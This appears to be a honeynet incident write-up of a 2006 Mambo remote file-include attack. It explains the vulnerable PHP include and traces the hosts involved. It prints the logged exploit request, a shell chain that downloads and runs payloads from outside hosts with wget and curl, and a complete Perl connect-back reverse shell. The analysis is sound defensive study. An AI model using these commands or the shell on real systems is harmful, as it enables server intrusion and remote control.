Mambo exploit

This section describes an instance of the Mambo exploit observed on out honeynet. The hosts involved in the attack are:

  • 216.63.z.z is the initiator of the exploit
  • 10.0.x.x is the victim
  • 66.98.a.a is the server on which the defacing tool resides
  • 216.99.b.b is the host the first-stage payload resides on
  • 217.160.c.c is the host that we connect back to and
  • 219.96.d.d is the host on which the second-stage payload resides

The following activity was logged by Apache during the attack:

216.63.z.z - - [28/Feb/2006:12:30:44 +1300] GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.b.b/cback;chmod%20744%20cback;
./cback%20217.160.c.c%208081;wget%20216.99.b.b/dc.txt...

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

When the exploit above is used against a vulnerable Mambo installation, the code that is executed is:
require_once( "http://66.98.a.a/cmd.txt?modules/mod_mainmenu.class.php" );

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project have analysed an incident in which this script 'cmd.txt' appears: "Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to
deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files. This will only be an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

cd /tmp; wget 216.99.b.b/cback; chmod 744 cback; ./cback
217.160.c.c 8081; wget 216.99.b.b/dc.txt; chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;cd /var/tmp; curl -o cback
http://216.99.b.b/cback;chmod 744 cback; ./cback 217.160.c.c 8081; curl
-o dc.txt http://216.99.b.b/dc.txt;chmod 744 dc.txt; perl dc.txt
217.160.c.c 8081;echo YYY;echo|

Five distinct hosts have participated in the attack up to the point that this command is executed

  • the victim
  • the host that exploited the vulnerability and initiated the download
  • the host that the malware is downloaded from
  • the host that will be connected to on port 8081
  • the host where the "Defacing Tool v2.0" resides

This script is dc.txt, a simple connect-back shell written in Perl:

 #!/usr/bin/perl
 use Socket;
 use FileHandle;
 $IP = $ARGV[0];
 $PORT = $ARGV[1];
 socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
 connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
 SOCKET?autoflush();
 open(STDIN, ">&SOCKET");
 open(STDOUT,">&SOCKET");
 open(STDERR,">&SOCKET");
 system("id; pwd; uname -a; w; HISTFILE=/dev/null /bin/sh -i");

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.